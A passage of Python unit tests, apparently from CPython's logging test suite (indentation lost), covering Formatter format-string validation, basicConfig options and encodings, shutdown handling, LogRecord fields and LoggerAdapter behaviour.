f = logging.Formatter("${asctime} - $message", style="$")
self.assertEqual(f._fmt, "${asctime} - $message")
f = logging.Formatter("$bar $$", style="$")
self.assertEqual(f._fmt, "$bar $$")
f = logging.Formatter("$bar $$$$", style="$")
self.assertEqual(f._fmt, "$bar $$$$") # this would print two $($$)
# Testing when ValueError being raised from incorrect format
# Percentage Style
self.assertRaises(ValueError, logging.Formatter, "%(asctime)Z")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)b")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)*")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)*3s")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)_")
self.assertRaises(ValueError, logging.Formatter, '{asctime}')
self.assertRaises(ValueError, logging.Formatter, '${message}')
self.assertRaises(ValueError, logging.Formatter, '%(foo)#12.3*f') # with both * and decimal number as precision
self.assertRaises(ValueError, logging.Formatter, '%(foo)0*.8*f')
# StrFormat Style
# Testing failure for '-' in field name
self.assert_error_message(
ValueError,
"invalid format: invalid field name/expression: 'name-thing'",
logging.Formatter, "{name-thing}", style="{"
)
# Testing failure for style mismatch
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, '%(asctime)s', style='{'
)
# Testing failure for invalid conversion
self.assert_error_message(
ValueError,
"invalid conversion: 'Z'"
)
self.assertRaises(ValueError, logging.Formatter, '{asctime!s:#30,15f}', style='{')
self.assert_error_message(
ValueError,
"invalid format: expected ':' after conversion specifier",
logging.Formatter, '{asctime!aa:15}', style='{'
)
# Testing failure for invalid spec
self.assert_error_message(
ValueError,
"invalid format: bad specifier: '.2ff'",
logging.Formatter, '{process:.2ff}', style='{'
)
self.assertRaises(ValueError, logging.Formatter, '{process:.2Z}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:<##30,12g}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:<#30#,12g}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:{{w}},{{p}}}', style='{')
# Testing failure for mismatch braces
self.assert_error_message(
ValueError,
"invalid format: expected '}' before end of string",
logging.Formatter, '{process', style='{'
)
self.assert_error_message(
ValueError,
"invalid format: Single '}' encountered in format string",
logging.Formatter, 'process}', style='{'
)
self.assertRaises(ValueError, logging.Formatter, '{{foo!r:4.2}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{{foo!r:4.2}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo/bar}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo:{{w}}.{{p}}}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!X:{{w}}.{{p}}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:random}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:ran{dom}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:ran{d}om}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo.!a:d}', style='{')
# Dollar style
# Testing failure for mismatch bare $
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, '$bar $$$', style='$'
)
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, 'bar $', style='$'
)
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, 'foo $.', style='$'
)
# Testing failure for mismatch style
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, '{asctime}', style='$'
)
self.assertRaises(ValueError, logging.Formatter, '%(asctime)s', style='$')
# Testing failure for incorrect fields
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, 'foo', style='$'
)
self.assertRaises(ValueError, logging.Formatter, '${asctime', style='$')
def test_defaults_parameter(self):
fmts = ['%(custom)s %(message)s', '{custom} {message}', '$custom $message']
styles = ['%', '{', '$']
for fmt, style in zip(fmts, styles):
f = logging.Formatter(fmt, style=style, defaults={'custom': 'Default'})
r = self.get_record()
self.assertEqual(f.format(r), 'Default Message with 2 placeholders')
r = self.get_record("custom")
self.assertEqual(f.format(r), '1234 Message with 2 placeholders')
# Without default
f = logging.Formatter(fmt, style=style)
r = self.get_record()
self.assertRaises(ValueError, f.format, r)
# Non-existing default is ignored
f = logging.Formatter(fmt, style=style, defaults={'Non-existing': 'Default'})
r = self.get_record("custom")
self.assertEqual(f.format(r), '1234 Message with 2 placeholders')
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
def test_default_msec_format_none(self):
class NoMsecFormatter(logging.Formatter):
default_msec_format = None
default_time_format = '%d/%m/%Y %H:%M:%S'
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 123, utc)
r.created = time.mktime(dt.astimezone(None).timetuple())
f = NoMsecFormatter()
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '21/04/1993 08:03:00')
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
with support.captured_stderr() as stderr:
root.debug('This should not appear')
self.assertEqual(stderr.getvalue(), '')
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), 'Final chance!\n')
# No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
with support.captured_stderr() as stderr:
root.warning('Final chance!')
msg = 'No handlers could be found for logger "root"\n'
self.assertEqual(stderr.getvalue(), msg)
# 'No handlers' message only printed once
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
# If raiseExceptions is False, no message is printed
root.manager.emittedNoHandlerWarning = False
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
finally:
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', OSError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', OSError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', OSError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
self.assertRaises(ValueError, logging.disable, "doesnotexists")
class _NotAnIntOrString:
pass
self.assertRaises(TypeError, logging.disable, _NotAnIntOrString())
logging.disable("WARN")
# test the default value introduced in 3.7
# (Issue #28524)
logging.disable()
self.assertEqual(logging.root.manager.disable, logging.CRITICAL)
def _test_log(self, method, level=None):
called = []
support.patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
def test_subclass_logger_cache(self):
# bpo-37258
message = []
class MyLogger(logging.getLoggerClass()):
def __init__(self, name='MyLogger', level=logging.NOTSET):
super().__init__(name, level)
message.append('initialized')
logging.setLoggerClass(MyLogger)
logger = logging.getLogger('just_some_logger')
self.assertEqual(message, ['initialized'])
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger.addHandler(h)
try:
logger.setLevel(logging.DEBUG)
logger.debug("hello")
self.assertEqual(stream.getvalue().strip(), "hello")
stream.truncate(0)
stream.seek(0)
logger.setLevel(logging.INFO)
logger.debug("hello")
self.assertEqual(stream.getvalue(), "")
finally:
logger.removeHandler(h)
h.close()
logging.setLoggerClass(logging.Logger)
def test_logging_at_shutdown(self):
# bpo-20037: Doing text I/O late at interpreter shutdown must not crash
code = textwrap.dedent("""
import logging
class A:
def __del__(self):
try:
raise ValueError("some error")
except Exception:
logging.exception("exception in __del__")
a = A()
""")
rc, out, err = assert_python_ok("-c", code)
err = err.decode()
self.assertIn("exception in __del__", err)
self.assertIn("ValueError: some error", err)
def test_logging_at_shutdown_open(self):
# bpo-26789: FileHandler keeps a reference to the builtin open()
# function to be able to open or reopen the file during Python
# finalization.
filename = os_helper.TESTFN
self.addCleanup(os_helper.unlink, filename)
code = textwrap.dedent(f"""
import builtins
import logging
class A:
def __del__(self):
logging.error("log in __del__")
# basicConfig() opens the file, but logging.shutdown() closes
# it at Python exit. When A.__del__() is called,
# FileHandler._open() must be called again to re-open the file.
logging.basicConfig(filename={filename!r}, encoding="utf-8")
a = A()
# Simulate the Python finalization which removes the builtin
# open() function.
del builtins.open
""")
assert_python_ok("-c", code)
with open(filename, encoding="utf-8") as fp:
self.assertEqual(fp.read().rstrip(), "ERROR:root:log in __del__")
def test_recursion_error(self):
# Issue 36272
code = textwrap.dedent("""
import logging
def rec():
logging.error("foo")
rec()
rec()
""")
rc, out, err = assert_python_failure("-c", code)
err = err.decode()
self.assertNotIn("Cannot recover from stack overflow.", err)
self.assertEqual(rc, 1)
def test_get_level_names_mapping(self):
mapping = logging.getLevelNamesMapping()
self.assertEqual(logging._nameToLevel, mapping) # value is equivalent
self.assertIsNot(logging._nameToLevel, mapping) # but not the internal data
new_mapping = logging.getLevelNamesMapping() # another call -> another copy
self.assertIsNot(mapping, new_mapping) # verify not the same object as before
self.assertEqual(mapping, new_mapping) # but equivalent in value
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
@staticmethod # pickled as target of child process in the following test
def _extract_logrecord_process_name(key, logMultiprocessing, conn=None):
prev_logMultiprocessing = logging.logMultiprocessing
logging.logMultiprocessing = logMultiprocessing
try:
import multiprocessing as mp
name = mp.current_process().name
r1 = logging.makeLogRecord({'msg': f'msg1_{key}'})
# https://bugs.python.org/issue45128
with support.swap_item(sys.modules, 'multiprocessing', None):
r2 = logging.makeLogRecord({'msg': f'msg2_{key}'})
results = {'processName' : name,
'r1.processName': r1.processName,
'r2.processName': r2.processName,
}
finally:
logging.logMultiprocessing = prev_logMultiprocessing
if conn:
conn.send(results)
else:
return results
def test_multiprocessing(self):
support.skip_if_broken_multiprocessing_synchronize()
multiprocessing_imported = 'multiprocessing' in sys.modules
try:
# logMultiprocessing is True by default
self.assertEqual(logging.logMultiprocessing, True)
LOG_MULTI_PROCESSING = True
# When logMultiprocessing == True:
# In the main process processName = 'MainProcess'
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
results = self._extract_logrecord_process_name(1, LOG_MULTI_PROCESSING)
self.assertEqual('MainProcess', results['processName'])
self.assertEqual('MainProcess', results['r1.processName'])
self.assertEqual('MainProcess', results['r2.processName'])
# In other processes, processName is correct when multiprocessing in imported,
# but it is (incorrectly) defaulted to 'MainProcess' otherwise (bpo-38762).
import multiprocessing
parent_conn, child_conn = multiprocessing.Pipe()
p = multiprocessing.Process(
target=self._extract_logrecord_process_name,
args=(2, LOG_MULTI_PROCESSING, child_conn,)
)
p.start()
results = parent_conn.recv()
self.assertNotEqual('MainProcess', results['processName'])
self.assertEqual(results['processName'], results['r1.processName'])
self.assertEqual('MainProcess', results['r2.processName'])
p.join()
finally:
if multiprocessing_imported:
import multiprocessing
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.setLevel(self.original_logging_level)
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_strformatstyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="{")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_stringtemplatestyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="$")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_filename(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', encoding='utf-8')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a', encoding='utf-8')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_filemode(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='%(asctime)s - %(message)s')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, '%(asctime)s - %(message)s')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
# Issue 23207: test for invalid kwargs
assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO)
# Should pop both filename and filemode even if filename is None
logging.basicConfig(filename=None, filemode='a')
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def test_force(self):
old_string_io = io.StringIO()
new_string_io = io.StringIO()
old_handlers = [logging.StreamHandler(old_string_io)]
new_handlers = [logging.StreamHandler(new_string_io)]
logging.basicConfig(level=logging.WARNING, handlers=old_handlers)
logging.warning('warn')
logging.info('info')
logging.debug('debug')
self.assertEqual(len(logging.root.handlers), 1)
logging.basicConfig(level=logging.INFO, handlers=new_handlers,
force=True)
logging.warning('warn')
logging.info('info')
logging.debug('debug')
self.assertEqual(len(logging.root.handlers), 1)
self.assertEqual(old_string_io.getvalue().strip(),
'WARNING:root:warn')
self.assertEqual(new_string_io.getvalue().strip(),
'WARNING:root:warn\nINFO:root:info')
def test_encoding(self):
try:
encoding = 'utf-8'
logging.basicConfig(filename='test.log', encoding=encoding,
errors='strict',
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
self.assertEqual(data,
'The Øresund Bridge joins Copenhagen to Malmö')
def test_encoding_errors(self):
try:
encoding = 'ascii'
logging.basicConfig(filename='test.log', encoding=encoding,
errors='ignore',
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
self.assertEqual(data, 'The resund Bridge joins Copenhagen to Malm')
def test_encoding_errors_default(self):
try:
encoding = 'ascii'
logging.basicConfig(filename='test.log', encoding=encoding,
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
self.assertEqual(handler.errors, 'backslashreplace')
logging.debug('😂: ☃️: The Øresund Bridge joins Copenhagen to Malmö')
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
self.assertEqual(data, r'\U0001f602: \u2603\ufe0f: The \xd8resund '
r'Bridge joins Copenhagen to Malm\xf6')
def test_encoding_errors_none(self):
# Specifying None should behave as 'strict'
try:
encoding = 'ascii'
logging.basicConfig(filename='test.log', encoding=encoding,
errors=None,
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
self.assertIsNone(handler.errors)
message = []
def dummy_handle_error(record):
_, v, _ = sys.exc_info()
message.append(str(v))
handler.handleError = dummy_handle_error
logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
self.assertTrue(message)
self.assertIn("'ascii' codec can't encode "
"character '\\xd8' in position 4:", message[0])
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
# didn't write anything due to the encoding error
self.assertEqual(data, r'')
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
support.patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_exception_excinfo(self):
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception('exc_info test', exc_info=exc)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
def test_nested(self):
class Adapter(logging.LoggerAdapter):
prefix = 'Adapter'
def process(self, msg, kwargs):
return f"{self.prefix} {msg}", kwargs
msg = 'Adapters can be nested, yo.'
adapter = Adapter(logger=self.logger, extra=None)
adapter_adapter = Adapter(logger=adapter, extra=None)
adapter_adapter.prefix = 'AdapterAdapter'
self.assertEqual(repr(adapter), repr(adapter_adapter))
adapter_adapter.log(logging.CRITICAL, msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, f"Adapter AdapterAdapter {msg}")
self.assertEqual(record.args, (self.recording,))
orig_manager = adapter_adapter.manager
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
temp_manager = object()
try:
adapter_adapter.manager = temp_manager
self.assertIs(adapter_adapter.manager, temp_manager)
self.assertIs(adapter.manager, temp_manager)
self.assertIs(self.logger.manager, temp_manager)
finally:
adapter_adapter.manager = orig_manager
self.assertIs(adapter_adapter.manager, orig_manager)
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
class LoggerTest(BaseTest, AssertErrorMessage):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assert_error_message(
TypeError, 'Level not an integer or a valid string: None',
self.logger.setLevel, None)
self.assert_error_message(
TypeError, 'Level not an integer or a valid string: (0, 0)',
self.logger.setLevel, (0, 0))
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
with support.swap_attr(logging, 'raiseExceptions', True):
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
with support.swap_attr(logging, 'raiseExceptions', False):
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
